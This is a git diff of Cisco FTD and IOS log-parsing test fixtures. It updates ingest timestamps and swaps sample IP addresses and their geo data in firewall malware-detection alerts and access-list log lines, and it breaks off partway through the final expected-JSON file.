a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-file-malware.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-file-malware.log-expected.json index b010166df41..12dc3d022ad 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-file-malware.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-file-malware.log-expected.json @@ -61,7 +61,7 @@ }, "event": { "severity": 1, - "ingested": "2021-07-19T09:06:54.935852844Z", + "ingested": "2021-12-09T13:33:14.721617600Z", "original": "Aug 14 2019 14:54:25 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41522, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: exploit.exe, FileType: ELF, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T14:54:24Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/exploit.exe", "code": "430004", "kind": "alert", @@ -163,7 +163,7 @@ }, "event": { "severity": 1, - "ingested": "2021-07-19T09:06:54.935865544Z", + "ingested": "2021-12-09T13:33:14.721627200Z", "original": "Aug 14 2019 14:55:02 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41526, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: exploit.exe, FileType: ELF, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T14:55:01Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/exploit.exe", "code": "430004", "kind": "alert", @@ -265,7 +265,7 @@ }, "event": { "severity": 1, - "ingested": "2021-07-19T09:06:54.935868496Z", + "ingested": "2021-12-09T13:33:14.721633400Z", "original": "Aug 14 2019 15:00:29 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41530, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: eicar.com, FileType: EICAR, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:00:27Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar.com", "code": "430004", "kind": "alert", @@ -367,7 +367,7 @@ }, "event": { "severity": 1, - "ingested": "2021-07-19T09:06:54.935870547Z", + "ingested": "2021-12-09T13:33:14.721639600Z", "original": "Aug 14 2019 15:01:41 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41534, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileName: eicar.com.txt, FileType: EICAR, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:01:40Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar.com.txt", "code": "430004", "kind": "alert", @@ -476,7 +476,7 @@ }, "event": { "severity": 1, - "ingested": "2021-07-19T09:06:54.935872479Z", + "ingested": "2021-12-09T13:33:14.721645500Z", "original": "Aug 14 2019 15:03:28 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41540, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, ThreatName: Unknown, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:03:27Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip", "code": "430004", "kind": "alert", @@ -589,7 +589,7 @@ }, "event": { "severity": 1, - "ingested": "2021-07-19T09:06:54.935874404Z", + "ingested": "2021-12-09T13:33:14.721651700Z", "original": "Aug 14 2019 15:03:33 siem-ftd %FTD-1-430004: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41542, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Detect, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, ThreatName: Unknown, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:03:31Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip", "code": "430004", "kind": "alert", @@ -702,7 +702,7 @@ }, "event": { "severity": 1, - "ingested": "2021-07-19T09:06:54.935876299Z", + "ingested": "2021-12-09T13:33:14.721657700Z", "original": "Aug 14 2019 15:09:43 siem-ftd %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 41544, DstPort: 8000, Protocol: tcp, FileDirection: Download, FileAction: Malware Block, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, ThreatScore: 76, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-14T15:09:40Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: File Size Is Too Small, URI: http://10.0.100.30:8000/eicar_com.zip", "code": "430005", "kind": "alert", @@ -758,25 +758,25 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "DE-ST", - "city_name": "Magdeburg", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Saxony-Anhalt", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 11.6167, - "lat": 52.1333 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 43341, + "number": 20712, "organization": { - "name": "MDlink online service center GmbH" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "213.211.198.62", + "address": "81.2.69.144", "port": 80, - "ip": "213.211.198.62" + "ip": "81.2.69.144" }, "source": { "port": 46004, @@ -828,7 +828,7 @@ ], "ip": [ "10.0.1.20", - "213.211.198.62" + "81.2.69.144" ] }, "host": { @@ -836,8 +836,8 @@ }, "event": { "severity": 1, - "ingested": "2021-07-19T09:06:54.935878168Z", - "original": "2019-08-16T09:39:03Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 213.211.198.62, SrcPort: 46004, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:39:02Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: File Size Is Too Small, URI: http://www.eicar.org/download/eicar_com.zip", + "ingested": "2021-12-09T13:33:14.721663800Z", + "original": "2019-08-16T09:39:03Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 46004, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:39:02Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: File Size Is Too Small, URI: http://www.eicar.org/download/eicar_com.zip", "code": "430005", "kind": "alert", "start": "2019-08-16T09:39:02Z", @@ -866,7 +866,7 @@ "file_sandbox_status": "File Size Is Too Small", "uri": "http://www.eicar.org/download/eicar_com.zip", "file_sha256": "2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad", - "dst_ip": "213.211.198.62", + "dst_ip": "81.2.69.144", "file_size": "184", "src_port": "46004", "src_ip": "10.0.1.20", @@ -950,7 +950,7 @@ }, "event": { "severity": 1, - "ingested": "2021-07-19T09:06:54.935880107Z", + "ingested": "2021-12-09T13:33:14.721669900Z", "original": "2019-08-16T09:40:45Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55378, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Unknown, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:40:45Z, FilePolicy: malware-and-file-policy, FileStorageStatus: Not Stored (Disposition Was Pending), FileSandboxStatus: Sent for Analysis, FileStaticAnalysisStatus: Failed to Send, URI: http://10.0.100.30/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", "code": "430005", "kind": "alert", @@ -1005,25 +1005,25 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "DE-HE", - "city_name": "Frankfurt am Main", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Hesse", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 8.6843, - "lat": 50.1188 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 16509, + "number": 20712, "organization": { - "name": "Amazon.com, Inc." + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "18.197.225.123", + "address": "81.2.69.144", "port": 80, - "ip": "18.197.225.123" + "ip": "81.2.69.144" }, "source": { "port": 47926, @@ -1032,9 +1032,9 @@ }, "url": { "path": "/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", - "original": "http://18.197.225.123/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", + "original": "http://81.2.69.144/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", "scheme": "http", - "domain": "18.197.225.123" + "domain": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -1074,7 +1074,7 @@ ], "ip": [ "10.0.1.20", - "18.197.225.123" + "81.2.69.144" ] }, "host": { @@ -1082,8 +1082,8 @@ }, "event": { "severity": 1, - "ingested": "2021-07-19T09:06:54.935882011Z", - "original": "2019-08-16T09:42:07Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 18.197.225.123, SrcPort: 47926, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Pdf.Exploit.Pdfka::100.sbx.tg, ThreatScore: 100, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:42:06Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: Failed to Send, URI: http://18.197.225.123/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", + "ingested": "2021-12-09T13:33:14.721675800Z", + "original": "2019-08-16T09:42:07Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47926, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7, SHA_Disposition: Malware, SperoDisposition: Spero detection not performed on file, ThreatName: Pdf.Exploit.Pdfka::100.sbx.tg, ThreatScore: 100, FileName: dd3dee576d0cb4abfed00f97f0c71c1d, FileType: PDF, FileSize: 278987, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 2019-08-16T09:42:06Z, FilePolicy: malware-and-file-policy, FileSandboxStatus: Failed to Send, URI: http://81.2.69.144/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", "code": "430005", "kind": "alert", "start": "2019-08-16T09:42:06Z", @@ -1111,9 +1111,9 @@ "first_packet_second": "2019-08-16T09:42:06Z", "file_sandbox_status": "Failed to Send", "threat_score": "100", - "uri": "http://18.197.225.123/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", + "uri": "http://81.2.69.144/public/infected/dd3dee576d0cb4abfed00f97f0c71c1d", "file_sha256": "9a04a82eb19ad382f9e9dbafa498c6b4291f93cfe98d9e8b2915af99c06ffcd7", - "dst_ip": "18.197.225.123", + "dst_ip": "81.2.69.144", "file_size": "278987", "src_port": "47926", "src_ip": "10.0.1.20", diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-malware-site.log b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-malware-site.log index 3caf6780a5c..65034c68c48 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-malware-site.log +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-malware-site.log @@ -1 +1 @@ -2020-03-01T01:02:36Z CISCO-SENSOR-3D Alerts %NGIPS-0-430003: DeviceUUID: 1c8ff662-08f3-11e4-85c0-bc960372972f, AccessControlRuleAction: Allow, AccessControlRuleReason: IP Monitor, SrcIP: 3.3.3.3, DstIP: 2.2.2.2, SrcPort: 65090, DstPort: 80, Protocol: tcp, IngressInterface: s1p1, EgressInterface: s1p2, IngressZone: Inside-DMZ-Interface-Inline, EgressZone: Inside-DMZ-Interface-Inline, ACPolicy: COOL-POLICY-3D, AccessControlRuleName: Inside DMZ-Rule-Inline, Prefilter Policy: Unknown, User: No Authentication Required, UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36, Client: Chrome, ClientVersion: 80.0.3987.87, ApplicationProtocol: HTTP, ConnectionDuration: 20, InitiatorPackets: 4, ResponderPackets: 4, InitiatorBytes: 729, ResponderBytes: 246, NAPPolicy: State-Backbone, SecIntMatchingIP: Destination, IPReputationSICategory: Malware, HTTPReferer: http://eyedropper-color-pick.info/mk?c=1581483445764, ReferencedHost: eyedropper-color-pick.info, URL: http://bad-malwaresite-grr.info/favicon.ico +2020-03-01T01:02:36Z CISCO-SENSOR-3D Alerts %NGIPS-0-430003: DeviceUUID: 1c8ff662-08f3-11e4-85c0-bc960372972f, AccessControlRuleAction: Allow, AccessControlRuleReason: IP Monitor, SrcIP: 81.2.69.144, DstIP: 81.2.69.144, SrcPort: 65090, DstPort: 80, Protocol: tcp, IngressInterface: s1p1, EgressInterface: s1p2, IngressZone: Inside-DMZ-Interface-Inline, EgressZone: Inside-DMZ-Interface-Inline, ACPolicy: COOL-POLICY-3D, AccessControlRuleName: Inside DMZ-Rule-Inline, Prefilter Policy: Unknown, User: No Authentication Required, UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36, Client: Chrome, ClientVersion: 80.0.3987.87, ApplicationProtocol: HTTP, ConnectionDuration: 20, InitiatorPackets: 4, ResponderPackets: 4, InitiatorBytes: 729, ResponderBytes: 246, NAPPolicy: State-Backbone, SecIntMatchingIP: Destination, IPReputationSICategory: Malware, HTTPReferer: http://eyedropper-color-pick.info/mk?c=1581483445764, ReferencedHost: eyedropper-color-pick.info, URL: http://bad-malwaresite-grr.info/favicon.ico diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-malware-site.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-malware-site.log-expected.json index 486bbc39f43..66994577c9e 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-malware-site.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-security-malware-site.log-expected.json @@ -10,43 +10,52 @@ "destination": { "geo": { "continent_name": "Europe", - "country_name": "France", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 2.3387, - "lat": 48.8582 - }, - "country_iso_code": "FR" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 3215, + "number": 20712, "organization": { - "name": "Orange" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "2.2.2.2", + "address": "81.2.69.144", "port": 80, "bytes": 246, - "ip": "2.2.2.2", + "ip": "81.2.69.144", "packets": 4 }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Seattle", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Washington", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -122.3451, - "lat": 47.6348 + "lon": -1.3614, + "lat": 51.7095 + } + }, + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "3.3.3.3", + "address": "81.2.69.144", "port": 65090, "bytes": 729, - "packets": 4, - "ip": "3.3.3.3" + "ip": "81.2.69.144", + "packets": 4 }, "url": { "path": "/favicon.ico", @@ -95,8 +104,7 @@ "CISCO-SENSOR-3D" ], "ip": [ - "3.3.3.3", - "2.2.2.2" + "81.2.69.144" ] }, "host": { @@ -110,8 +118,8 @@ "event": { "severity": 0, "duration": 20000000000, - "ingested": "2021-07-19T09:06:55.879883471Z", - "original": "2020-03-01T01:02:36Z CISCO-SENSOR-3D Alerts %NGIPS-0-430003: DeviceUUID: 1c8ff662-08f3-11e4-85c0-bc960372972f, AccessControlRuleAction: Allow, AccessControlRuleReason: IP Monitor, SrcIP: 3.3.3.3, DstIP: 2.2.2.2, SrcPort: 65090, DstPort: 80, Protocol: tcp, IngressInterface: s1p1, EgressInterface: s1p2, IngressZone: Inside-DMZ-Interface-Inline, EgressZone: Inside-DMZ-Interface-Inline, ACPolicy: COOL-POLICY-3D, AccessControlRuleName: Inside DMZ-Rule-Inline, Prefilter Policy: Unknown, User: No Authentication Required, UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36, Client: Chrome, ClientVersion: 80.0.3987.87, ApplicationProtocol: HTTP, ConnectionDuration: 20, InitiatorPackets: 4, ResponderPackets: 4, InitiatorBytes: 729, ResponderBytes: 246, NAPPolicy: State-Backbone, SecIntMatchingIP: Destination, IPReputationSICategory: Malware, HTTPReferer: http://eyedropper-color-pick.info/mk?c=1581483445764, ReferencedHost: eyedropper-color-pick.info, URL: http://bad-malwaresite-grr.info/favicon.ico", + "ingested": "2021-12-09T13:33:16.993211300Z", + "original": "2020-03-01T01:02:36Z CISCO-SENSOR-3D Alerts %NGIPS-0-430003: DeviceUUID: 1c8ff662-08f3-11e4-85c0-bc960372972f, AccessControlRuleAction: Allow, AccessControlRuleReason: IP Monitor, SrcIP: 81.2.69.144, DstIP: 81.2.69.144, SrcPort: 65090, DstPort: 80, Protocol: tcp, IngressInterface: s1p1, EgressInterface: s1p2, IngressZone: Inside-DMZ-Interface-Inline, EgressZone: Inside-DMZ-Interface-Inline, ACPolicy: COOL-POLICY-3D, AccessControlRuleName: Inside DMZ-Rule-Inline, Prefilter Policy: Unknown, User: No Authentication Required, UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36, Client: Chrome, ClientVersion: 80.0.3987.87, ApplicationProtocol: HTTP, ConnectionDuration: 20, InitiatorPackets: 4, ResponderPackets: 4, InitiatorBytes: 729, ResponderBytes: 246, NAPPolicy: State-Backbone, SecIntMatchingIP: Destination, IPReputationSICategory: Malware, HTTPReferer: http://eyedropper-color-pick.info/mk?c=1581483445764, ReferencedHost: eyedropper-color-pick.info, URL: http://bad-malwaresite-grr.info/favicon.ico", "code": "430003", "kind": "event", "start": "2020-03-01T01:02:16.000Z", @@ -140,9 +148,9 @@ "responder_packets": "4", "access_control_rule_action": "Allow", "nap_policy": "State-Backbone", - "dst_ip": "2.2.2.2", + "dst_ip": "81.2.69.144", "ac_policy": "COOL-POLICY-3D", - "src_ip": "3.3.3.3", + "src_ip": "81.2.69.144", "protocol": "tcp", "application_protocol": "HTTP", "initiator_bytes": "729", diff --git a/packages/cisco/data_stream/ios/_dev/test/pipeline/test-cisco-ios.log b/packages/cisco/data_stream/ios/_dev/test/pipeline/test-cisco-ios.log index d52c0d7b1b8..17ba60830b8 100644 --- a/packages/cisco/data_stream/ios/_dev/test/pipeline/test-cisco-ios.log +++ b/packages/cisco/data_stream/ios/_dev/test/pipeline/test-cisco-ios.log @@ -1,19 +1,19 @@ -Feb 8 04:00:48 198.51.100.2 585917: Feb 8 04:00:47.272: %SEC-6-IPACCESSLOGRP: list 177 denied igmp 198.51.100.197 -> 224.0.0.22, 1 packet -Feb 9 04:00:48 198.51.100.2 585918: Feb 9 04:00:47.272: %SEC-6-IPACCESSLOGSP: list INBOUND-ON-F11 denied igmp 198.51.100.2 -> 224.0.0.2 (20), 1 packet -Feb 10 04:00:48 198.51.100.2 585919: Feb 10 04:00:47.272: %SEC-6-IPACCESSLOGNP: list 171 denied 0 198.51.100.1 -> 255.255.255.255, 1 packet -May 3 19:11:33 198.51.100.2 585920: May 3 19:11:32.619: %IPV6-6-ACCESSLOGP: list ACL-IPv6-E0/0-IN/10 permitted tcp 2001:DB8::3(1027) -> 2001:DB8:1000::1(22), 9 packets -Jun 20 02:41:40 198.51.100.2 1663303: Jun 20 02:41:39.326: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(55250) -> 198.51.100.255(15600), 1 packet -Jun 20 02:41:45 198.51.100.2 1663304: Jun 20 02:41:44.921: %SEC-6-IPACCESSLOGDP: list 151 denied icmp 198.51.100.1 -> 198.51.100.2 (3/4), 1 packet -Jun 20 02:42:28 198.51.100.2 1663312: Jun 20 02:42:27.342: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(54309) -> 198.51.100.255(15600), 1 packet -Jun 20 02:42:28 198.51.100.2 1663313: Jun 20 02:42:28.374: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 18 packets -Jun 20 02:42:34 198.51.100.2 1663314: Jun 20 02:42:33.340: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(43989) -> 198.51.100.255(15600), 1 packet -Jun 20 02:43:09 198.51.100.2 1663321: Jun 20 02:43:08.454: %SEC-6-IPACCESSLOGP: list 150 denied tcp 198.51.100.12(59832) -> 172.217.10.46(80), 1 packet -Jun 20 02:43:29 198.51.100.2 1663325: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 23 packets -Jun 20 02:43:29 198.51.100.2 1663326: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGDP: list 150 denied icmp 198.51.100.12 -> 198.51.100.1 (3/3), 32 packets -Jun 20 02:43:30 198.51.100.2 1663327: Jun 20 02:43:29.451: %SEC-6-IPACCESSLOGP: list 150 denied tcp 198.51.100.12(59834) -> 172.217.10.46(80), 1 packet -Mar 24 18:06:03 198.51.100.2 1991219: Mar 24 18:06:03.424 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: john.smith] [Source: 10.2.55.3] [localport: 22] at 12:06:03 MST Wed Mar 24 2021 -Mar 24 18:06:00 198.51.100.2 1991220: Mar 24 18:06:00.364 UTC: %SYS-6-LOGOUT: User john.smith has exited tty session 5(10.5.36.9) -Mar 24 17:37:39 198.51.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (*, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3 -Mar 24 17:37:39 198.51.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (10.50.22.5, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3 -Mar 24 12:09:35 198.51.100.2 1991217: Mar 24 12:09:35.367: %OSPF-4-NOVALIDKEY: No valid authentication send key is available on interface eth0 -Mar 24 12:06:47 198.51.100.2 1991218: Mar 24 12:06:47.099: %CCH323-6-CALL_PRESERVED: cch323_h225_handle_conn_loss: H.323 call preserved due to socket closure or error, Call Id = 6527, fd = 19 \ No newline at end of file +Feb 8 04:00:48 192.168.100.2 585917: Feb 8 04:00:47.272: %SEC-6-IPACCESSLOGRP: list 177 denied igmp 192.168.100.197 -> 224.0.0.22, 1 packet +Feb 9 04:00:48 192.168.100.2 585918: Feb 9 04:00:47.272: %SEC-6-IPACCESSLOGSP: list INBOUND-ON-F11 denied igmp 192.168.100.2 -> 224.0.0.2 (20), 1 packet +Feb 10 04:00:48 192.168.100.2 585919: Feb 10 04:00:47.272: %SEC-6-IPACCESSLOGNP: list 171 denied 0 192.168.100.1 -> 255.255.255.255, 1 packet +May 3 19:11:33 192.168.100.2 585920: May 3 19:11:32.619: %IPV6-6-ACCESSLOGP: list ACL-IPv6-E0/0-IN/10 permitted tcp 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(1027) -> 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(22), 9 packets +Jun 20 02:41:40 192.168.100.2 1663303: Jun 20 02:41:39.326: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(55250) -> 192.168.100.255(15600), 1 packet +Jun 20 02:41:45 192.168.100.2 1663304: Jun 20 02:41:44.921: %SEC-6-IPACCESSLOGDP: list 151 denied icmp 192.168.100.1 -> 192.168.100.2 (3/4), 1 packet +Jun 20 02:42:28 192.168.100.2 1663312: Jun 20 02:42:27.342: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(54309) -> 192.168.100.255(15600), 1 packet +Jun 20 02:42:28 192.168.100.2 1663313: Jun 20 02:42:28.374: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 18 packets +Jun 20 02:42:34 192.168.100.2 1663314: Jun 20 02:42:33.340: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(43989) -> 192.168.100.255(15600), 1 packet +Jun 20 02:43:09 192.168.100.2 1663321: Jun 20 02:43:08.454: %SEC-6-IPACCESSLOGP: list 150 denied tcp 192.168.100.12(59832) -> 81.2.69.144(80), 1 packet +Jun 20 02:43:29 192.168.100.2 1663325: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 23 packets +Jun 20 02:43:29 192.168.100.2 1663326: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGDP: list 150 denied icmp 192.168.100.12 -> 192.168.100.1 (3/3), 32 packets +Jun 20 02:43:30 192.168.100.2 1663327: Jun 20 02:43:29.451: %SEC-6-IPACCESSLOGP: list 150 denied tcp 192.168.100.12(59834) -> 81.2.69.144(80), 1 packet +Mar 24 18:06:03 192.168.100.2 1991219: Mar 24 18:06:03.424 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: john.smith] [Source: 10.2.55.3] [localport: 22] at 12:06:03 MST Wed Mar 24 2021 +Mar 24 18:06:00 192.168.100.2 1991220: Mar 24 18:06:00.364 UTC: %SYS-6-LOGOUT: User john.smith has exited tty session 5(10.5.36.9) +Mar 24 17:37:39 192.168.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (*, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3 +Mar 24 17:37:39 192.168.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (10.50.22.5, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3 +Mar 24 12:09:35 192.168.100.2 1991217: Mar 24 12:09:35.367: %OSPF-4-NOVALIDKEY: No valid authentication send key is available on interface eth0 +Mar 24 12:06:47 192.168.100.2 1991218: Mar 24 12:06:47.099: %CCH323-6-CALL_PRESERVED: cch323_h225_handle_conn_loss: H.323 call preserved due to socket closure or error, Call Id = 6527, fd = 19 \ No newline at end of file diff --git a/packages/cisco/data_stream/ios/_dev/test/pipeline/test-cisco-ios.log-expected.json b/packages/cisco/data_stream/ios/_dev/test/pipeline/test-cisco-ios.log-expected.json index 09ff64b5582..d24b33ae03d 100644 --- a/packages/cisco/data_stream/ios/_dev/test/pipeline/test-cisco-ios.log-expected.json +++ b/packages/cisco/data_stream/ios/_dev/test/pipeline/test-cisco-ios.log-expected.json @@ -4,7 +4,7 @@ "log": { "level": "informational", "source": { - "address": "198.51.100.2" + "address": "192.168.100.2" } }, "destination": { @@ -13,15 +13,15 @@ }, "source": { "packets": 